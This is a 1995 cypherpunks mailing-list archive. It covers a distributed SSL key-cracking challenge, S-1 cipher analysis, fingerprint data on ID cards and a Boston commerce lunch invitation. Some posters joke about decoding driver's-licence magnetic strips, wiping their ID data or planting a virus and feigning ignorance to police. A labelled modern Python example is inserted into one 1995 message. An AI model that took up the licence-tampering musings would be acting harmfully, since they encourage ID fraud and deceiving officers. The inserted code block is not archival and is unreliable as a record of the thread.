            The Boston Society for Digital Commerce


A few weeks ago, before my San Francisco trip, I had a great
lunch with Peter Cassidy, a contract writer and industrial analyst.
Cassidy writes stuff on digital commerce and other net.things for the
Economist, Wired and a number of other drier trade rags and authors the
occasional market research piece for industrial research firms around
Boston.

As disparate as our backgrounds and life experiences may be, our luncheon was
reminiscent of the original AA meeting.  We gibbered at each other for two
hours about strong cryptography and the enormous potential of Web-mediated
commerce and the effects of both on life, the universe, and everything.
It was marvelous for two informed parties to share thoughts on the
substance of the revolution at hand, undistracted by hype and hyperbole
that too often haunts these subjects.

I went on to hang out that night with a couple of pals from my school
days at Chicago and they had *no* idea what I was talking about, though
they could tell it had me pretty animated.

Both Peter and I figured we needed to have a regular fix of this, and we both
figured that there are others in Boston who would benefit from the same
experience. People in Boston who have some understanding of the financial
markets, the internet, strong cryptography and the consequences of
mixing the three: digital certificates, the potential for absolute
anonymity, and geodesic markets for everything from financial instruments
to software to professional services.

People in Boston who would like to meet once a month or so in a function
room somewhere downtown, have lunch, and listen to a speaker or see a
net.demo, or just hang out and gab on some aspect of digital commerce.

So, to quote Andy Hardy, "I've got a barn!  Let's have a show!".
I've made some calls, and I can get a meeting room for a couple of hours
and a nice lunch for 20 people in downtown Boston for about $25 a head as
a starting point, subject to demand and scalability.

I figure the agenda of the first meeting will be an introduction
of everybody, and organizing some kind of structure for further meetings:
programming and anything else we need to do to get the next meeting(s)
organized, including picking a name.  The imposing name "Boston Society for
Digital Commerce" is just prima facie, subject to change at the first
meeting.

At the moment, I'm looking at a meeting date of Tuesday, October 3rd,
and at a location to be named later for lunch, say from 12:00 to 2.
I'll give you a hint: it's a 30th floor room overlooking the Charles
from downtown, and, yes, you need a coat and tie.  I figure I'll
collect checks payable to the place where we have lunch, with, say, a
registration cutoff of 2 days prior to the event, so I can get the room
paid for in advance, and so we can bootstrap this financially until
we come up with a better method for doing things.

How to Sign Up: Reply to this message if you're interested in helping
this get started, or if you just want to have lunch and talk shop with
people who'll actually understand what you're saying, and I'll give you
all the details.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gerstein@scsud.ctstateu.edu (Adam J. Gerstein)
Date: Tue, 29 Aug 95 10:30:16 PDT
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: Florida Drivers Permits
Message-ID: <v02130504ac67f7eda3c3@[17.127.10.254]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:54 AM on 8/29/95, Jonathan Zamick is believed to have said:
>>>>Better would be to figure out the encoding scheme and post it here.
>>>
>>>I like this, myself.  It'd be nice to be able to have the picture of my
>>>choosing instead of a digitized thumbprint...
>>
>>I think the officer arresting you would frown if your license dumped a nudie
>>picture of Cindy Crawford instead of your identification details.
>>
>>Sounds like a great way to smuggle nuclear secrets out of a country tho :)
>
>What is the capacity of the mag strips. Do they carry much more than some
>ID code for computer reference? It seems unlikely that there is enough
>storage
>for a thumbprint. Some vitals perhaps, but again it would most likely simply
>be a speedier way of referencing the card holder's supposed True Name. (After
>all they'd have to be checking driving record information as well.) Still
>decrypting the cards would be amusing, just to aggravate those who become too
>used to the convenience. 'Oh.. sorry Governor Wilson... my but you look
>different up close'.

Back in CT they have mag strips and holograms on the drivers license, but
they aren't taking full advantage last I checked (about 8 months ago, when
I was last in CT).

Anyway, once an enterprising c'punk cracks the code, what's to stop people
from putting more interesting info on the strips? Or possibly a virus? Is
it conceivable? And if there is enough room on there for personal info, why
not wipe the data that's there and put your PGPKey there. And when Officer
Opie asks "What happened to your info and why's it all scrambled?" an
innocent "I dunno" would have to suffice....

Just my 0.02...

adam

"Practice safe HEX - always use a keyboard condom" - anon
PGP Key available by finger or mail with the sub: PGPKEY
+-------------------------------------------------------+
|(e)Mail me:                    |  MacGeek@eWorld.com   |
|  Gerstein@scsu.ctstateu.edu   |  AGerstein@aol.com    |
+-------------------------------+-----------------------+
                    EWWWWW! - Betsy
             Shop smart! Shop S-Mart! - Ash






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Tue, 29 Aug 95 10:26:50 PDT
To: <cypherpunks@toad.com>
Subject: TLA Menu!
Message-ID: <v03002d00ac67ba46a3f6@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


Time to use your imagination, because...


It's the TLA Phone Menu!                       pair-o-dee by <ddt@lsd.com>


[   A french horn version of "The Lion King" fades in quickly, and a       ]
[   smarmy male voice reminiscent of that 415.777.FILM guy comes on...     ]


"Welcome to the Three Letter Agency's Help Line!

- If you're calling to report a threat to National Security, please press
  "1" now...
- If you're calling to threaten the life of the President of the United
  States, please have your manifesto ready to fax and press "2"...
- If you're calling to report a bomb that's been left somewhere at a TLA
  complex, please have your five-digit terrorist group identification code
  ready and press "3" now...
- If you're calling to report an imminent nuclear emergency within the
  territorial borders of the United States, please press "4" now...
- If you're calling to find out what "Squeamish Ossifrage" means,
  please press "5" now...
- If you're calling to inform on Phil Zimmermann, please press "6" now...
- If you're calling to report an Internet security problem that may affect
  our ability to packet-filter your local network, please press "7" now...
- If you're calling to donate money to Senator Exon's re-election campaign,
  please press "8" now...
- If you're a member of any State Militia or paramilitary group needing
  assistance with plans to overthrow a state government, please have your
  copy of the US Constitution ready and press "9" now...
- If you're submitting a new encryption algorithm challenge, please visit
  our website at http://www.tla.gov/cray-this, or press "0" now...
- If you're calling to report any unauthorized use of cryptography by
  pornographers, drug dealers, terrorists and/or religious cults, please
  press the "star" key now, or stay on the line, and a National Security
  Analyst will be with you in a moment..."

[   Naturally, we press the "star" key... a few mournful moments pass      ]
[   as, in the background, a valiant attempt is made by 40 melancholy      ]
[   strings and an antic saxophonist to produce a Musak rendition of       ]
[   Rockwell's "(I Always Feel Like) Somebody's Watching Me," when         ]
[   suddenly the Musak fades back...                                       ]

"...Thank you for your patience. All of our jack-(and jill!-) booted agents
are busy cracking other citizens' shopping-lists or reverse-tracing your
phone number at this time, but your call _is_ important to us, so please
remain on the line, and a National Security Analyst will be with you
momentarily..."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: keelings@wu1.wl.aecl.ca (S. Keeling)
Date: Wed, 30 Aug 95 08:13:54 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <9508291415.AA02629@wu1.wl.aecl.ca>
MIME-Version: 1.0
Content-Type: text/plain


Incoming from Daniel R. Oelke:
> 
[presumably piete brooks?]:
> > >PS3: I'd like to get the raw date in brloop (a sh script). In perl I'd just
> > >     use "time", and I can't see a way to get "date +" to yield the raw time.
> > >     I could use "date=`perl -e 'print time'`" but that seems OTT, and perl
> > >     may not be on the user's PATH. Any suggestions ?
> >
[anonymous?]
> > "date '+%s'" does it under BSDI, but I'm not sure how portable it is.
>  
> This is what I got from SunOS 4.1.x
>  
>         $ date +%s
>         date: bad format character - s

	On Ultrix, I get:

$_ date '+%s'
s
$_

and on OSF/1:

$_ date '+%s'
%s
$_

	XMan (OSF/1) says:

		"To display the date and time in a specified format, enter:

		date +"%r %d %h %y (%a)"	[note the `+' outside the ""]

which gives me:

		08:58:39 AM 29 Aug 95 (Tue)

FWIW ...


-- 

 "Remember, obsolescence (Win95) isn't an accident;  it's an art form!" 
   keelings@wu1.wl.aecl.ca       s. keeling,   aecl - whiteshell labs



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 29 Aug 95 10:31:12 PDT
To: cypherpunks@toad.com
Subject: Re: SSL trouble
Message-ID: <9508291427.AA00854@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart writes:
>  The main failure mode seems to have been misconfigured clients
>  grabbing the single-threaded server for a long time; it may be
>  worth using a multi-threaded server, or alternatively a
>  single-threaded server that has a fast timeout for how long it will
>  talk to a client.

Single-user is just plain silly.  With a fast timeout you still have problems  
with misconfigured clients hogging the server and legitimate clients that are  
running a little slow will also have problems.  The server in the second  
challenge did have a fast timeout (it was too fast to easily query the server  
by hand, for instance) and it still wasn't adequate.  I can't imagine making  
the timeout smaller.  multi-user is the only way to go...

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Tue, 29 Aug 95 06:46:16 PDT
To: cypherpunks@toad.com
Subject: Decoder ring
Message-ID: <Pine.SUN.3.91.950829093407.21598A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


     High-Tech Company Goes Back to the Future with Decoder Rings
The Stuff of Cereal Box-Tops Becomes Real Repository of Data and Computer ID

			   By Carlos Tejeda
	      Staff Reporter of the Wall Street Journal

Once, the only way to get a decoder ring was to carve up cereal
box-tops or comic-book covers.

Now Dallas Semiconductor Corp. is creating its own high-tech version of 
the "decoder" ring.  Although this one doesn't break any codes, it can 
unlock some doors of information.  It consists of a 64000-bit microchip, 
embedded in a silver ring made by class-rings titan Jostens Inc., of 
Minneapolis.

The rings can be implanted with a replica of a driver's license, 
credit-card numbers and even a digitized photograph.  Company officials 
say they hope the ring's data-carrying capability will help bring 
personal information literally to one's fingertips.

"My wallet's stuffed with a dozen different plastic cards," said Hal 
Kurkowski, Dallas Semiconductor's group manager for auto-identification 
products.  "It's an awful mess.  You could put all that and more into the 
ring and not have a four-inch-thick wallet."

The ring is triggered when the metal piece at the head of the ring comes 
in contact with a data reader.  To prevent theft, the ring can be 
formatted so that it only can be used in conjunction with a password, Mr. 
Kurkowski said.

The technology already is being used at Dallas Semiconductor's 
headquarters, as something of a company ID card, said Syd Coppersmith, 
director of public relations.

"I use it to get into my office, and it records who I am and when I went 
in," she said.  "There's a reader on my PC, and I use it to get into my 
files."

The rings cost about $60 each, while readers that can be plugged into a 
computer can be purchased for about $80.

Ms. Coppersmith said several security companies already have the 
technology to install such readers for their clients.  She said the 
system also has been tested commercially at a warehouse, where employees 
used the ring to record inventory changes.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 28 Aug 95 16:57:28 PDT
To: jpb@shadow.net (Joe Block)
Subject: Re: Florida Drivers Permits
In-Reply-To: <v01520c02ac676a6dcba1@[198.79.48.55]>
Message-ID: <199508282255.AA46059@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>>Better would be to figure out the encoding scheme and post it here.
>
>I like this, myself.  It'd be nice to be able to have the picture of my
>choosing instead of a digitized thumbprint...

I think the officer arresting you would frown if your license dumped a nudie
picture of Cindy Crawford instead of your identification details.

Sounds like a great way to smuggle nuclear secrets out of a country tho :)

Mark
The above opinions are rumoured to be mine



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Mon, 28 Aug 95 17:25:13 PDT
To: ab411@detroit.freenet.org
Subject: Re: SSL trouble
In-Reply-To: <199508281852.OAA22478@detroit.freenet.org>
Message-ID: <199508282326.AA32757@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>Patrick Horgan <patrick@Verity.COM> writes:
>>I did a distributed scheme for something else that had two levels, a master
>>and a group of slaves.  Only the slaves talked to the master.  For this 
>>effort I think a variation of the idea would be better.  Have all of the
>>brutes contact the master, who will, in the first transaction assign them
>>to the next slave in a round-robin fashion.
>
>Why not just have the brutes pick a slave at random?  Of course, you need
>to give them a complete list of slaves to choose from.  But then the only
>difference between the master and the slaves will be that the master
>doesn't get any keyspace (it's got it all to begin with) and doesn't
>report any results upward.

Better to include in the clients a list of all slaves and have the initial
contact to a slave random, maybe weighted by network proximity, and either
have the clients cycle to each slave with each ACK, or have the slave TELL
the clients what server to ACK to next, based on slave to slave balancing.
Slaves could tune their pointers to faster slaves and transparently handle
crashed slaves.

The idea is to have all the slaves working evenly, assuming they are on equal
nets and equal machines. If not then you can have the slaves tell clients to
only point to a weaker slave once in a while.

I don't think advertising the master is a good idea, better to have the slaves
talking to it only. A backup mirror master would be worthwhile too.

Web people would most likely have to communicate with the one central http
server as you have to Keep It Simple for them.

Comments?

Mark



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Tue, 29 Aug 95 10:25:57 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Austin cpunks?
Message-ID: <199508291532.AA15521@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


If you live in the metro Austin area, please drop me a line. To the
rest of you, sorry for the noise.

- -- 
Paul Robichaux, KD4JZG       | Do you support free speech? Even when
perobich@ingr.com            | you don't like what's being said?
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEMy6afb4pLe9tolAQEXrwP/dPhTNVeuzNYA78Aow2B9ruINvBO324tG
sRa2HYdT8bpZGh8DBXx7hS9zIFNMF5qw6GeoVpK8aqwmRhdbbnNoVq8x5Cps/APQ
lQRu3AqPvtu46fZK6/faBHdzElqSNRIvQxG1O3o1kZhLmZctxdlyu00wJgH7tj/Z
+jMhQ7kaWgQ=
=VmEL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted_Anderson@transarc.com
Date: Tue, 29 Aug 95 10:20:46 PDT
To: dawagner@tucson.princeton.edu
Subject: Re: Cryptanalysis of S-1
In-Reply-To: <41l6u3$852@cnn.Princeton.EDU>
Message-ID: <skEmR=X0BwwMM0o3Im@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


I find this very interesting.  You have made two related points here
which highlight some important principles of cipher design: (1) more
rounds do not always help and (2) the key schedule can be a limiting
factor in a cipher's strength.  In some sense these are "obvious", but
it helps a lot to have a specific example of these points to think
about. 

After the early looks at S-1 and after reading Blaze & Schneier's paper
on MacGuffin (ftp://research.att.com/dist/mab/mcg.ps) I was thinking
that any half-assed Feistel network could be made secure by adding more
rounds.  So I was thinking about quantifying the systemic cost of adding
more rounds and thereby reducing performance.  It seems that there has
been insufficient analysis of the performance vs. security trade-off. 
In some sense this is understandable given the lack of quantification of
security, but when it comes to engineering a system for real world use,
you have to make a choice and it would be nice to have something to go
on.  Consider for example the use of Blowfish instead of IDEA in
PGPfone; according to Paul Rubin [in "Re: IDEA with PGPFone?",
28-Aug-1995, sci.crypt] this was at least partly due to the performance
difference. 

But here we have a clear limit.  In S-1 the key schedule effectively
limits the number of rounds that contribute to security at about five. 
Further we have a concrete design principle: the per-round sub-keys
should not repeat.  Probably a stronger statement could be made. 

Excerpts from netnews.sci.crypt: 16-Aug-95 Re: S1 cipher P.
Hallam-Baker@w3.org (3569*) 

> I would like to suggest some hypotheses :- 
Maybe this type of cryptanalysis is old hat but it seemed new to me.  It
made me think of another hypothesis for the S-1 release: 
  - It is a training exercise. 
Consider that the primary reason given for keeping Skipjack secret is
that the algorithm would reveal valuable hints about cryptanalysis and
cipher design.  It also seems obvious that the NSA would have a College
of Cryptanalysis to educate new generations of crypto experts.  I could
easily imagine it including a series of exercises, of progressively
increasing difficulty, where attacking each cipher illustrates one or
more cryptographic principles.  Possibly a crypto-anarchist NSA mole
decided it would be safer to leak a page from NSA's workbook than Skipjack
itself; an infraction less likely to be pursued if nothing else. 

If this seems unlikely, consider that the NSA has been getting beaucoup
bucks for many years now.  With the fall of the "Evil Empire" and all,
perhaps things are getting a bit soft at the core.  Maybe some NSA
strategist figured that a little cross-fertilization between the
academic and national-security crypto communities would enliven both
groups. 

So the question is: Will another exercise appear?  Or perhaps there is
more to learn from this one. 

Ted Anderson 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Tue, 29 Aug 95 10:22:16 PDT
To: Will French <wfrench@interport.net>
Subject: Re: SSL trouble
In-Reply-To: <199508290338.XAA24000@interport.net>
Message-ID: <9508291647.AA13894@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Will French writes
>Scott Brickner writes:
>> Then what do you care about the group's procedures?  It
>> doesn't "prevent you from participating" --- you *aren't*
>> participating. You're attempting to solve the problem on your
>> own.

>  This distinction is valid in the current series of academic
>exercises.  However, if we were actually trying to break
>something important, anything that might accelerate the crack
>would be a form of participation.  And as Nathan Loofbourrow has
>pointed out, the random method is much more secure against
>real-world retaliation.  It's also the only method that will
>work for me; I use a shell account, and I never know in advance
>when I will get time on the computers at work (which aren't on
>the net at all).

We've identified several forms of "real-world retaliation:"

1) "Result hoarding" - failure to report a found key
2) "Segment hoarding" - requesting more segments than one can hope to search
3) Denial of service - preventing access to the server

The "random search" method eliminates all three of these at about 37%
higher cost in search time, on the average.  I submit that if we
*really* were trying to break something important, we could design a
system which eliminated the first two and adequately limited the third,
but at *much* less cost.

The problems in the current system were to be expected of a first
attempt.  In the future:  Only the server assigns segments, only the
assignee may report the status of a segment, and after all segments are
NAKed we know condition 1 has occurred, at which time we start over,
but never assign the same segment to the same searcher.  Limit the
number of segments which may be outstanding with one searcher at one
time as a function of work rate.  Deploy redundant servers.

As to whether the distinction is valid, I'd still say the only
difference between working on your own and working "with" the group,
but using an uncoordinated, random search method is one of intent ---
that is, it's all in your mind.

>  I _don't_ care about the procedures, as long as I can get the
>information I need to go my own way.

So what information wouldn't you be getting?  To "go your own way", you
need exactly the same information that the client workstations use to
test one key.  The difference in your code and the clients exists
solely in how they determine the next key to try.

You're not "participating" when you go your own way.  You're working on
cracking the cipher, but you're not adding your efforts to the group
effort, you're working independently.  I'm not saying this is "wrong".
You're supposedly a free person, do what you think is right.
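
[Added example, not part of the original message and not the challenge server's code: a small in-memory model of the assignment rules proposed above, showing how they bound segment hoarding and recover from a withheld result. The names SegmentServer and run_search, the work-rate limit function and the server-side timeout are assumptions made for illustration.]

```python
from collections import defaultdict


class SegmentServer:
    """In-memory model of the assignment rules proposed in the message."""

    def __init__(self, n_segments, max_outstanding=4):
        self.n = n_segments
        self.max_outstanding = max_outstanding
        self.pending = set(range(n_segments))  # unassigned in the current pass
        self.owner = {}                        # segment -> searcher holding it
        self.naked = set()                     # segments NAKed in the current pass
        self.history = defaultdict(set)        # segment -> searchers ever assigned
        self.completed = defaultdict(int)      # searcher -> segments reported
        self.found = None                      # (segment, key) once reported
        self.passes = 1

    def limit(self, who):
        # Assumed work-rate function: one segment for a newcomer, one more per
        # completed segment, capped at max_outstanding.
        return min(self.max_outstanding, 1 + self.completed[who])

    def request(self, who):
        """Only the server picks the segment; returns None if nothing is due."""
        if self.found is not None:
            return None
        held = sum(1 for o in self.owner.values() if o == who)
        if held >= self.limit(who):
            return None                        # bounds segment hoarding
        for seg in sorted(self.pending):
            if who not in self.history[seg]:   # never the same searcher twice
                self.pending.remove(seg)
                self.owner[seg] = who
                self.history[seg].add(who)
                return seg
        return None

    def report(self, who, seg, key=None):
        """Accept a status only from the searcher the segment was assigned to."""
        if self.owner.get(seg) != who:
            return False
        del self.owner[seg]
        self.completed[who] += 1
        if key is not None:
            self.found = (seg, key)
            return True
        self.naked.add(seg)
        if len(self.naked) == self.n:
            # Every segment NAKed and no key: a result was withheld. Start over.
            self.naked.clear()
            self.pending = set(range(self.n))
            self.passes += 1
        return True

    def expire(self, seg):
        # Assumption (not in the message): a server-side timeout returns an
        # unreported segment to the pool.
        if self.owner.pop(seg, None) is not None:
            self.pending.add(seg)


def run_search(n_segments, key_segment, behaviours, max_rounds=100):
    """behaviours maps searcher name -> 'honest', 'withhold' or 'hoard'."""
    server = SegmentServer(n_segments)
    for _ in range(max_rounds):
        for who, kind in behaviours.items():
            seg = server.request(who)
            if seg is None or kind == "hoard":
                continue                       # hoarders never report back
            hit = seg == key_segment and kind == "honest"
            server.report(who, seg, key="K" if hit else None)
            if server.found:
                return server
        for seg in list(server.owner):         # end of round: time out stragglers
            server.expire(seg)
    return server


if __name__ == "__main__":
    # Constructed scenario: the withholder draws the key segment first.
    s = run_search(4, 0, {"withholder": "withhold", "hoarder": "hoard",
                          "honest": "honest"})
    print("found:", s.found, "after", s.passes, "passes")
```

[In the constructed scenario the key is missed on the first pass because the withholder NAKs its segment, and is found on the second pass once that segment goes to a different searcher.]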




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WOOD@VAX2.ROCKHURST.EDU
Date: Tue, 29 Aug 95 10:20:21 PDT
To: cypherpunks@toad.com
Subject: Joel's RSA-t's
Message-ID: <01HUN7RYOMZM003M4J@VAX2.ROCKHURST.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Josh Osborne's RSA-perl T-shirt venture,
> 
> I don't know about the rest of you, but I didn't realise from Joel's
> last post to the list that he was taking orders for them.  I guess
> that's as close to an announcement as he's going to make.  I just
> checked his netstuff web page, and he's taking orders now!
> 
> Check out:
> 
> 	http://www.danger.com/ad-perl.html
> 
> (this is referenced from Joel's netstuff page under currently
> available items:
> 
> 	http://www.danger.com/netstuff.html
> )
> 
> From the Joel's web page:
> 
> > DEADLINE TO ORDER: All orders for these shirts must be postmarked by
> > June 1, 1995.
> 
> Also my page on perl-rsa is:
> 
> 	http://dcs.ex.ac.uk/~aba/perl-rsa.html
> 
> I'll be away from my mail for the rest of this week, so maybe someone
> can post this info to all the crypto groups...
> 
> Adam
> --
> 
> HAVE *YOU* EXPORTED A CRYPTO SYSTEM TODAY? --> http://dcs.ex.ac.uk/~aba/x.html
> --rsa--------------------------------8<-------------------------------------
> #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
> ($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
> Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
> ,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)
> -------------------------------------8<-------------------------------------
> TRY: echo squeamish ossifrage | rsa -e 3 7537d365 | rsa -d 4e243e33 7537d365
> 
	

Has anyone received a shirt from Joel?  Or is he ripping people off?

Many thanks,

-------------------------------------------
 |   "Computers are boring and slow."    |                     
 |                                       |
 | 	David Wood                       |
 |      Information Systems Specialist?  |
 |  	wood@vax2.rockhurst.edu          |
-------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 29 Aug 95 12:05:44 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <199508291905.MAA04950@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:47 PM 8/29/95 -0500, you wrote:
>Alan Olsen writes
>>They would not have to include an entire thumbprint.  The actual code used
>>to verify fingerprints is not very large.  All that would be needed is
>>enough information to ID into the "official" records and enough checksum
>>type information to prevent alteration/counterfeiting.  Using magnetic media
>>for this is a bit foolish as it can be changed/destroyed with the stroke of
>>a magnet.  I will not say by what means I would think should suit as a
>>better encoding scheme because: 1) They are not using it and 2) I do not
>>want to give them any ideas.
>
>What possible value could the LEAs get by having your thumbprint digitally
>encoded on your driver's license?  It's not like the average cop-on-the-beat
>is qualified to lift a fingerprint and compare it.  Even if he was, how
>does it benefit that the fingerprint is on the license?
>
>This seems silly.

I was pointing out that it was possible.  I was not trying to make the point
that there was any *USE* for such a thing.  (Evidently some ID cards now
carry such prints. California does, if memory serves me correctly.)

Just because something is silly does not mean it will not be tried by
someone in law enforcement.  In fact, there seems to be a correlation between
silly acts and law enforcement...  (Or at least those making the rules about
law enforcement.)  And if you think it cannot get any worse, Pete "I want to
seal the borders" Wilson has announced he is running for president.  We will
be getting a large number of silly laws and pronouncements if the American
people are stupid enough to elect him to high office.

>
>
|            Visualize whirled keys!              | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites    | Disclaimer:          |
|all mankind free in one-key-stenography-privacy!"| Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 29 Aug 95 12:57:06 PDT
To: Alan Olsen <cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <v02120d04ac6927926ea0@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:57 8/28/95, Alan Olsen wrote:
>They would not have to include an entire thumbprint.  The actual code used
>to verify fingerprints is not very large.

This is true. While waiting for the local US Post Office clerk to process a
passport application, I browsed through their book of FBI's Most Wanted
(available at every Post Office, just ask for it). Each person's
fingerprints were specified with an alphanumeric code that took up less
than half a line.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: d-jones@ix.netcom.com (Dave)
Date: Tue, 29 Aug 95 12:35:40 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <199508291933.MAA22876@ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>What possible value could the LEAs get by having your thumbprint digitally
>encoded on your driver's license?  It's not like the average cop-on-the-beat
>is qualified to lift a fingerprint and compare it.  Even if he was, how
>does it benefit that the fingerprint is on the license?
>
>This seems silly.

There are devices that will electronically read fingerprints available now.  So
with such a device, the LEO would know instantly if you were who you said
that you were.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 29 Aug 95 12:42:52 PDT
To: cypherpunks@toad.com
Subject: SSL keyspace etc.
Message-ID: <199508291940.MAA22969@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


regarding SSL challenge, I am not following this closely enough 
to understand completely, but I thought I would offer a few suggestions
for tweaking the code:

--

the issue of grabbing keyspace has been raised. what if someone
malicious just yanked huge areas of keyspace and didn't search them?
it seems that the clients need to return to the server some evidence
that they have searched their keyspace in question. the server could
verify this evidence. for those that don't return the "evidence", that
keyspace could be reallocated to other comers.

the simple approach to all this, if you don't have "evidence", is to 
just have the server keep reallocating the same space over and over
to different crackers. hopefully eventually every part of the keyspace
would be allocated to a "legitimate" worker.

--

the issue of efficiency is very fascinating for this project. essentially
the server has no idea what the block size of key blocks it should dole
out. obviously the server would want to try to dole out equal *processing
chunks* such that the remote machine reports back in a certain amount
of time, no matter what architecture. the problem of course is that remote
machines all have different efficiency.

two possibilities: a sort of "bogomip" calculation is done in the client,
and its processor speed is reported to the server. the server uses
this in a calculation to determine how much to dole out. it could try 
to derive a best fit linear relationship between space covered and
processor speed, or build up a table of results and interpolate for
new requests.

note that the efficiency issue also ties into "what if people take
keys they don't solve". if the server knows roughly how long a client
should take to report back, and it never reports back, it could then
reallocate that key space.

--

another problem of efficiency is that the server is clearly a bottleneck
for servicing requests. the question arises: suppose that the server
could determine the precise interval between which machines would
go back to it for new keys. what is the optimum interval over the
whole project? in other words, given the number of machines participating,
and their processor speeds, what size of key space should be parceled
out to the next request so that the bottleneck at the server is
minimized? this optimum interval must be very hard to derive, because
it depends on the contention based on many incoming connections. it
would involve some probabilistic approximations of the likelihood
of collisions. 

to model it, you might consider a request as taking [n] seconds of
time, and consider that if any two requests are in contention, a 
retry happens after [m] seconds. you could build up models that
would try to minimize the time based on empirical simulations. 
however I would be exceedingly impressed if someone could derive
a formula for this, or give it from some textbook. 

--

adaptive algorithms for all these situations are possible. the server
could use a "hypothesis" in the sense of partitioning out a starting
size of keyspace, and then watch how long it took the client machine to respond,
and then assume a linear relationship or something to compute the size
of the next keyspace to hand out to the machine. the server could continually
watch how closely its "hypothesis" (i.e. its estimations of how long a
given machine will take) match the actual returns.

--

more on the idea of evidence: we are working with a hashing algorithm,
right? as evidence the client machines could return checksums of all
the hashes of all the keyspace it searched. it could break up its
own search space into blocks and return the checksums on the hashes
for each block. the server, if it wanted to, could verify these blocks
running its own computations. if it ever found a client was "unreliable",
it could then diminish the keys sent to the unreliable client, or even
send it areas of search space it didn't care about anymore (i.e. areas
that have already been confirmed searched by a more "reliable" client).

--

in fact all this reminds me of the process of intelligence gathering
by an agency, which could be formalized as follows: suppose that
the agency wishes to identify "quality information". it has a set
of sources, A,B,C,D....  now, it can send questions out to these
sources and get information from them. some of them however would
be "unreliable". the agency must devise some means by which it can
weed out the unreliable sources. note that this may even involve
sending them bogus instructions to keep them busy so they do not
themselves suspect they have been "discovered" and then change
their defective plans.

obviously, one of the most important intelligence tools in this
matter is that of *correlation*. you have to determine "truth"
(or "quality information") via the correlation between answers that
the different sources give you. also important to correlation is
*redundancy*. you sometimes have to ask more than one source the
same question, and test the answer. in this model, if A and B
give different answers, you know that one of A or B is "unreliable".

what is very interesting in our case of cracking keys is that the
server can verify the information on its own. in other words, it
has a *control* that it knows is correct that it can judge against
the answers "out there". unfortunately, in contrast, real intelligence
agencies are not always privy to this kind of certain "control" and
in fact have to determine "truth" entirely from a set of sources,
any of which might be unreliable. in this case one has to have
a hypothesis about what is the "truth" and test it to see if it
holds up consistently with all information.

the approaches of attackers are obvious. the most obvious is that
of collusion and infiltration. but I will save the rest for some
NSA spook to elaborate. there are certainly enough colluding and
infiltrating on this list <g>

--

one of the reasons all this interests me is that it really reminds me
of some projects I have worked on in the past. in high school I wrote
a network mandelbrot set program (client/host). the issue of contention
